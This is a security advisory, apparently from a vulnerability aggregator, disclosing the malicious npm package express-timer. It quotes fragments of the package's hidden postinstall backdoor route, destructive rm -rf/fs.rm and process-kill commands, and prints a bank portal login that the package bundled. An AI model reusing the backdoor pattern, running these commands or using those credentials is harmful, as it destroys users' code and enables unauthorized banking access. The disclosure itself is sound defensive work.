Vulnerability
Malicious code in express-timer (npm)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (5b4fd1651a86f29904cbafe5a1d50f51a3108413ce0fef61fd92cfc61dedc683) express-timer is a destructive supply-chain attack masquerading as an Express security-headers helper. Three independent harm mechanisms fire on install or load: 1. Postinstall backdoor injection (scripts/inject.js): The postinstall hook walks up to the installer's project root, locates the main Express entry file, and appends a hidden route handler `app.get('/robots.txt', (req, res) => { if (req.query.verify === 'destroy') { _boom();... } })`. The injected `_boom()` recursively deletes the installer's `./src` directory (`fs.rm(dir, { recursive: true, force: true })`) and kills all node processes (`taskkill /IM node.exe /F` on Windows, `pkill -f "node.*<cwd>"` on Unix). Any remote actor who hits `GET /robots.txt?verify=destroy` on the deployed server can wipe the installer's source and crash node processes. The injection persists in the installer's own source tree even after `npm uninstall`. 2. Auto-scheduled destruction on require (index.js): `package.json` sets `main: index.js`, and that file's top-level code calls `scheduleDestructionAfter()` with a 1-minute default timer. After 60 seconds, it executes `rm -rf <cwd>/src` (Unix `execSync`) or the equivalent `fs.rm` on Windows, then kills node/PM2 processes. Simply importing the package destroys the consumer's source tree one minute later, with no opt-in, no documented API, and no guard. 3. Bundled bank-fraud tooling (ibbl_statment.php): The tarball ships a PHP scraper hardcoded with credentials (`USER=mohiuddin767272@gmail.com`, `PASS=Sorifa@2020`) for Islami Bank Bangladesh's customer agent portal at `https://agent.islamibankbd.com`, used to scrape arbitrary customer NIDs, account numbers, and transactions. Unrelated to the advertised purpose; redistributes access to a third-party banking system to anyone who installs the package. Supporting context: `package.json` author is the placeholder `"Your Name"`, the description ("Lightweight security helpers for Express") contradicts the actual behavior, and `dependencies` declares both a self-reference (`express-timer: ^1.0.0`) and a revealing sibling `express-self-destruct1`.
No CVSS base score from NVD or GHSA yet. NVD typically scores within 24–72 hours of publication; GHSA usually within a day for OSS-flagged CVEs. Last record update .
For interim severity, fall back on KEV / EXPLOIT signals and the EPSS percentile (lower panel). Re-check this CVE after one cron tick — the score lands automatically when the source publishes.
FIRST.org publishes EPSS daily. Coverage isn't universal — pre-disclosure CVEs and reserved IDs don't carry an EPSS score until at least one exploitation signal lands. Score will appear within 24 hours of the next EPSS pull.
No exploitation, limited impact or prevalence